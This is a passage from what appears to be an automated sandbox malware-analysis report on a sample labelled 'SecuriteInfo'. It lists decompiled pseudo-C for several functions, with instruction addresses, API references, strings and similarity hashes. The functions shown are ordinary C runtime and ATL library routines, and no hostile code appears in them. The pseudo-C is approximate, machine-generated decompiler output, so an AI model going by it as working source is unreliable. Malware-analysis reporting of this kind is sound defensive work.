                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Decorator::doMailboxNameName::Name::operator+=ScoreUnder
                      • String ID: 5$void
                      • API String ID: 3298578019-571193483
                      • Opcode ID: d0f2561dd9c77b34b0833159ad684014fc5f8e5b1d1275570273ac7ea701c9a7
                      • Instruction ID: 2af5a5318f143026937f19493607a9846a341b19c055fa32dce8e60b14d4a52a
                      • Opcode Fuzzy Hash: d0f2561dd9c77b34b0833159ad684014fc5f8e5b1d1275570273ac7ea701c9a7
                      • Instruction Fuzzy Hash: 6A21A6B0D54618DBCB08EF94DC92AEEBB74BF84301F14417AE84667291DB346B44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00967F80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00967F80(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
				char _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr _t39;
				intOrPtr _t42;
				char* _t45;
				intOrPtr _t46;
				char* _t50;
				char* _t51;
				char* _t52;
				intOrPtr _t53;
				char* _t55;

				E0095F1F0( &_v20, 0x9d8cb8 + _a8 * 8);
				_t51 =  *0xb30640; // 0x0
				_v8 =  *_t51;
				_t39 =  *0xb30640; // 0x0
				 *0xb30640 = _t39 + 1;
				if(_v8 != 0x40) {
					L2:
					E0095F350(_a4, 2);
					return _a4;
				}
				_t52 =  *0xb30640; // 0x0
				_v12 =  *_t52;
				_t42 =  *0xb30640; // 0x0
				 *0xb30640 = _t42 + 1;
				if(_v12 == 0x5f) {
					_t53 =  *0xb30640; // 0x0
					 *0xb30640 = _t53 + 1;
					E00964900(__ebx, __edi, __esi,  &_v28, 0);
					E00964900(__ebx, __edi, __esi,  &_v36, 0);
					while(1) {
						_t55 =  *0xb30640; // 0x0
						if( *_t55 == 0) {
							break;
						}
						_t50 =  *0xb30640; // 0x0
						if( *_t50 == 0x40) {
							break;
						}
						_t34 =  *0xb30640; // 0x0
						 *0xb30640 = _t34 + 1;
					}
					_t45 =  *0xb30640; // 0x0
					if( *_t45 != 0) {
						_t46 =  *0xb30640; // 0x0
						 *0xb30640 = _t46 + 1;
						E0095F240(_a4,  &_v20);
						return _a4;
					}
					_t30 =  *0xb30640; // 0x0
					 *0xb30640 = _t30 - 1;
					E0095F350(_a4, 1);
					return _a4;
				}
				goto L2;
			}



















                      0x00967f94
                      0x00967f99
                      0x00967fa2
                      0x00967fa5
                      0x00967fae
                      0x00967fb8
                      0x00967fdb
                      0x00967fe0
                      0x00000000
                      0x00967fe5
                      0x00967fba
                      0x00967fc3
                      0x00967fc6
                      0x00967fcf
                      0x00967fd9
                      0x00967fed
                      0x00967ff6
                      0x00968002
                      0x00968010
                      0x00968018
                      0x00968018
                      0x00968023
                      0x00000000
                      0x00000000
                      0x00968025
                      0x00968031
                      0x00000000
                      0x00000000
                      0x00968033
                      0x0096803b
                      0x0096803b
                      0x00968042
                      0x0096804d
                      0x0096806b
                      0x00968074
                      0x00968081
                      0x00000000
                      0x00968086
                      0x0096804f
                      0x00968057
                      0x00968061
                      0x00000000
                      0x00968066
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: NameName::$Mailbox
                      • String ID: @$_
                      • API String ID: 4073702289-2246572305
                      • Opcode ID: 88a5b99b9d2f4b3a8f7e09a9a5000424cc63bc1734720d1673c3be05b4141e66
                      • Instruction ID: def05b12bc5777db7e4a73a72cb542fdb4acca4b31448fcf077ad5ece58d483d
                      • Opcode Fuzzy Hash: 88a5b99b9d2f4b3a8f7e09a9a5000424cc63bc1734720d1673c3be05b4141e66
                      • Instruction Fuzzy Hash: 19316FB0690924DFE704EF54ECA2ABE3B75FFC1305F244159E8094B269DF31A965CB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009D2000 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E009D2000(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v16;
				char _v528;
				char _v1040;
				char _v1552;
				void* __esi;
				signed int _t17;
				signed int _t31;
				void* _t44;
				intOrPtr _t46;
				signed int _t47;

				_t45 = __edi;
				_t35 = __ebx;
				_t17 =  *0xa0600c; // 0x5d529087
				_v8 = _t17 ^ _t47;
				_t46 = _a8;
				if(E009D4BA0(_a4,  &_v16, 3,  &_v1552, 0x100,  &_v1040, 0x100,  &_v528, 0x100) != 0 || E00992600( &_v1040, 9, L"MSPDB140") != 0 || E00992600( &_v528, 4, L"DLL") != 0) {
					return E00957280(0, _t35, _v8 ^ _t47, _t44, _t45, _t46);
				} else {
					_t31 = E009D2ED0(_t46, _a12,  &_v16,  &_v1552,  &_v1040,  &_v528);
					asm("sbb eax, eax");
					return E00957280( ~_t31 + 1, __ebx, _v8 ^ _t47, _t44, __edi, _t46);
				}
			}














                      0x009d2000
                      0x009d2000
                      0x009d2009
                      0x009d2010
                      0x009d201d
                      0x009d204f
                      0x009d20ce
                      0x009d2085
                      0x009d20a2
                      0x009d20ac
                      0x009d20bd
                      0x009d20bd

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __aligned_msize$Report
                      • String ID: DLL$MSPDB140
                      • API String ID: 4069037947-1197931371
                      • Opcode ID: 18bf8a575aa0ddfaadf8269d89de96ed85fd1c33dafbdc47a72b96d2149b226b
                      • Instruction ID: 6073355cd20aa0170958a8a6507bfce6c385b1a17eeea26a00b8e72db0e188cd
                      • Opcode Fuzzy Hash: 18bf8a575aa0ddfaadf8269d89de96ed85fd1c33dafbdc47a72b96d2149b226b
                      • Instruction Fuzzy Hash: DD217BB694011CBADB10DF94DC42FEA736C9B54304F404296FA15E6181FA719B548791
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009436B0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 58COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00942900: ___InlineInterlockedCompareExchangePointer.VCCORLIBD ref: 00942927
                        • Part of subcall function 00942900: GetLastError.KERNEL32 ref: 00942935
                        • Part of subcall function 00942900: _HRESULT_FROM_WIN32.LIBCMTD ref: 00942943
                      • _Smanip.LIBCPMTD ref: 0094372B
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                      Strings
                      • %ls, xrefs: 00943742
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00943723
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094374E
                      • ERROR : Unable to initialize critical section in CAtlComModule, xrefs: 0094370C
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckCompareErrorExchangeInlineInterlockedLastPointerSmanipStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in CAtlComModule
                      • API String ID: 1685745658-3641726158
                      • Opcode ID: edcae89b5b5ba489cf13329afa8d759cc66863137590c4d38f23e4968af11cce
                      • Instruction ID: af1314612ab2fc65d1072a6af7e51c5764ac89eca8d96a1c1648cb96e7732fa9
                      • Opcode Fuzzy Hash: edcae89b5b5ba489cf13329afa8d759cc66863137590c4d38f23e4968af11cce
                      • Instruction Fuzzy Hash: FF1160B4E44208FBDB00EF9CD956F6DB7B4AB81708F608498F6016B392DBB15F008B55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00955FC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                      Download Yara Rule
                      APIs
                      • _Smanip.LIBCPMTD ref: 00956025
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                      Strings
                      • %ls, xrefs: 0095603C
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 0095601D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00956048
                      • ERROR - Object deleted before window was destroyed, xrefs: 00956006
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckSmanipStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$ERROR - Object deleted before window was destroyed
                      • API String ID: 1089072215-1108591109
                      • Opcode ID: 16c538578a9726e024eecf80f43474b9d66c946300b46236ca6c6f6ab01271fb
                      • Instruction ID: dd1b9ffd0a8cf2a30b2415cf4dc63b887b62e8c1518b3b8287b6872237858a03
                      • Opcode Fuzzy Hash: 16c538578a9726e024eecf80f43474b9d66c946300b46236ca6c6f6ab01271fb
                      • Instruction Fuzzy Hash: 3D11A071E84209ABDB14EF99DC03F6AB768FB80B04F404A2AF605A76C2DAB555048795
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094C110 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 55COMMON
                      Download Yara Rule
                      C-Code - Quality: 26%
                      			E0094C110(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t15;
				void* _t20;
				void* _t30;
				void* _t31;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				if(_a4 != 0) {
					__eflags =  *_a4 - 0x2c;
					if(__eflags == 0) {
						 *((intOrPtr*)(_a4 + 0x1c)) = 0;
						_v8 = E00942900(_a4 + 4, __esi, __eflags);
						__eflags = _v8;
						if(__eflags < 0) {
							_push("ERROR : Unable to initialize critical section in AtlWinModuleInit\n");
							_push(0);
							_push(E0094F1E0(0xb33748));
							_push(E009423B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20d9));
							E009423E0(__ebx, __edi, __esi, __eflags);
							_t31 = _t31 + 0x10;
							__eflags = 0;
							if(0 == 0) {
								_t20 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20da, 0, "%ls", 0x9f40dc);
								_t31 = _t31 + 0x18;
								__eflags = _t20 - 1;
								if(__eflags == 0) {
									asm("int3");
								}
							}
						}
						_t15 = _v8;
					} else {
						_t15 = 0x80070057;
					}
				} else {
					_t15 = 0x80070057;
				}
				return E009D1520(_t15, _t30 - _t31 + 0xc);
			}










                      0x0094c116
                      0x0094c11d
                      0x0094c124
                      0x0094c12f
                      0x0094c13e
                      0x0094c141
                      0x0094c14d
                      0x0094c15f
                      0x0094c162
                      0x0094c166
                      0x0094c168
                      0x0094c16d
                      0x0094c179
                      0x0094c18c
                      0x0094c18d
                      0x0094c192
                      0x0094c195
                      0x0094c197
                      0x0094c1b1
                      0x0094c1b6
                      0x0094c1b9
                      0x0094c1bc
                      0x0094c1be
                      0x0094c1be
                      0x0094c1bc
                      0x0094c197
                      0x0094c1bf
                      0x0094c143
                      0x0094c143
                      0x0094c143
                      0x0094c131
                      0x0094c131
                      0x0094c131
                      0x0094c1cf

                      Strings
                      • %ls, xrefs: 0094C19E
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094C17F
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094C1AA
                      • ERROR : Unable to initialize critical section in AtlWinModuleInit, xrefs: 0094C168
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in AtlWinModuleInit
                      • API String ID: 0-4079014719
                      • Opcode ID: 39df43957becd038e591508a3fbac43cb9abf813d76b477f92f85e0106a8f24c
                      • Instruction ID: 2c897fdd0e411f0794bfaaf329a6544efc416f530ad0dd1508e149060ee2825a
                      • Opcode Fuzzy Hash: 39df43957becd038e591508a3fbac43cb9abf813d76b477f92f85e0106a8f24c
                      • Instruction Fuzzy Hash: 5711C2B1E4520CFFDB10EF58DC57F2D3664AB90708F208455FA052B283E6B59A508B85
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095DBA2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E0095DBA2(void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _t31;
				void* _t48;

				 *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + 0xfffffffffffffffc)) =  *((intOrPtr*)(_t48 - 0x34));
				E00959A50(__ebx,  *((intOrPtr*)(_t48 - 0x34)), __edi, __esi,  *((intOrPtr*)(_t48 - 0x38)));
				 *((intOrPtr*)(E0095C670(__ebx,  *((intOrPtr*)(_t48 - 0x34)), __edi, __esi) + 0x10)) =  *((intOrPtr*)(_t48 - 0x3c));
				 *((intOrPtr*)(E0095C670(__ebx,  *((intOrPtr*)(_t48 - 0x3c)), __edi, __esi) + 0x14)) =  *((intOrPtr*)(_t48 - 0x40));
				_t31 =  *((intOrPtr*)(_t48 + 8));
				if( *_t31 == 0xe06d7363) {
					_t38 =  *((intOrPtr*)(_t48 + 8));
					if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x10)) == 3) {
						if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x14)) == 0x19930520) {
							L5:
							if( *((intOrPtr*)(_t48 - 0x44)) == 0 &&  *((intOrPtr*)(_t48 - 0x28)) != 0) {
								_t31 = E0095B2C0(_t38,  *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x18)));
								if(_t31 != 0) {
									if( *((intOrPtr*)(_t48 - 0x48)) == 0) {
										 *(_t48 - 0x19) = 0;
									} else {
										 *(_t48 - 0x19) = 1;
									}
									_push( *(_t48 - 0x19) & 0x000000ff);
									return E0095B0E0( *((intOrPtr*)(_t48 + 8)));
								}
							}
						} else {
							_t31 =  *((intOrPtr*)(_t48 + 8));
							if( *((intOrPtr*)(_t31 + 0x14)) == 0x19930521) {
								goto L5;
							} else {
								_t38 =  *((intOrPtr*)(_t48 + 8));
								if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x14)) == 0x19930522) {
									goto L5;
								}
							}
						}
					}
				}
				return _t31;
			}





                      0x0095dbb0
                      0x0095dbb7
                      0x0095dbc7
                      0x0095dbd2
                      0x0095dbd5
                      0x0095dbde
                      0x0095dbe0
                      0x0095dbe7
                      0x0095dbf3
                      0x0095dc0d
                      0x0095dc11
                      0x0095dc20
                      0x0095dc2a
                      0x0095dc30
                      0x0095dc38
                      0x0095dc32
                      0x0095dc32
                      0x0095dc32
                      0x0095dc40
                      0x00000000
                      0x0095dc4a
                      0x0095dc2a
                      0x0095dbf5
                      0x0095dbf5
                      0x0095dbff
                      0x00000000
                      0x0095dc01
                      0x0095dc01
                      0x0095dc0b
                      0x00000000
                      0x00000000
                      0x0095dc0b
                      0x0095dbff
                      0x0095dbf3
                      0x0095dbe7
                      0x0095dc4d

                      APIs
                        • Part of subcall function 00959A50: ___vcrt_getptd.LIBVCRUNTIMED ref: 00959A56
                        • Part of subcall function 00959A50: ___vcrt_getptd.LIBVCRUNTIMED ref: 00959A6C
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095DBBF
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095DBCA
                      • __IsExceptionObjectToBeDestroyed.LIBVCRUNTIMED ref: 0095DC20
                      • ___DestructExceptionObject.LIBCMTD ref: 0095DC45
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd$ExceptionObject$DestroyedDestruct
                      • String ID: csm
                      • API String ID: 485384042-1018135373
                      • Opcode ID: 43f3dd555d828a9f6842bfda216e3fcc1360bef38e7dd899cbb3451b7ead1d39
                      • Instruction ID: 866c5b4a6243dc95cc6d1eac233a52ad9212feea754ad4c59bd559040e9782cc
                      • Opcode Fuzzy Hash: 43f3dd555d828a9f6842bfda216e3fcc1360bef38e7dd899cbb3451b7ead1d39
                      • Instruction Fuzzy Hash: 8C212974902208DFCB28DF66D044AAE7B7AAFA4306F548058EC550F752C774DE89CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009A8780 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E009A8780(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed char _t13;
				void* _t18;
				void* _t24;

				E00976E20( &_v16, _a4);
				_t13 = E0098EE40( &_v16);
				_t21 = _t13 & 0x000000ff;
				if((_t13 & 0x000000ff) == 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_v12 = _v8;
				_t27 = _v12;
				if(_v12 == 0) {
					_t18 = L00994930(_t27, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\fileno.cpp", 0x11, 0, L"%ls", L"stream.valid()");
					_t24 = _t24 + 0x18;
					if(_t18 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					return E009A8760( &_v16);
				} else {
					 *((intOrPtr*)(L00992F70(_t21))) = 0x16;
					return E00992900(L"stream.valid()", L"_fileno", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\fileno.cpp", 0x11, 0) | 0xffffffff;
				}
			}









                      0x009a878f
                      0x009a8797
                      0x009a879c
                      0x009a87a1
                      0x009a87ac
                      0x009a87a3
                      0x009a87a3
                      0x009a87a3
                      0x009a87b6
                      0x009a87b9
                      0x009a87bd
                      0x009a87d4
                      0x009a87d9
                      0x009a87df
                      0x009a87e1
                      0x009a87e1
                      0x009a87df
                      0x009a87e6
                      0x00000000
                      0x009a87e8
                      0x009a87ed
                      0x00000000
                      0x009a880e

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009A878F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$_fileno$minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp$stream.valid()
                      • API String ID: 4219598475-3741990651
                      • Opcode ID: c8c90eaad939ebefab32ae81ba90f851743838759da985090b34db5c1a0f8a2b
                      • Instruction ID: b01eff24c3af4b591222f96f8c75434f2349033944d1acbe4e0df156a0f4eca9
                      • Opcode Fuzzy Hash: c8c90eaad939ebefab32ae81ba90f851743838759da985090b34db5c1a0f8a2b
                      • Instruction Fuzzy Hash: 2701B1B0E40208BADF24FB94CD42BAEB7A89BC5708F308154F1192A1C2CEB45E44C6D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009546E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON
                      Download Yara Rule
                      C-Code - Quality: 79%
                      			E009546E0(struct HWND__** __ecx, void* __esi, intOrPtr _a4, int _a8) {
				struct HWND__** _v8;
				void* _t10;
				void* _t17;
				void* _t27;
				void* _t28;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t10 = E009D1520(IsWindow( *_v8), _t28 - _t28);
				_t31 = _t10;
				if(_t10 == 0) {
					_t17 = L00994930(_t31, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x6d4, 0, "%ls", L"::IsWindow(m_hWnd)");
					_t28 = _t28 + 0x18;
					if(_t17 == 1) {
						asm("int3");
					}
				}
				E00954630(_a4, E009D1520(GetDlgItem( *_v8, _a8), _t28 - _t28));
				return E009D1520(_a4, _t27 - _t28 + 4);
			}








                      0x009546e3
                      0x009546e5
                      0x009546ec
                      0x009546ff
                      0x00954704
                      0x00954706
                      0x00954720
                      0x00954725
                      0x0095472b
                      0x0095472d
                      0x0095472d
                      0x0095472b
                      0x0095474b
                      0x00954761

                      APIs
                      Strings
                      • %ls, xrefs: 0095470D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00954719
                      • ::IsWindow(m_hWnd), xrefs: 00954708
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
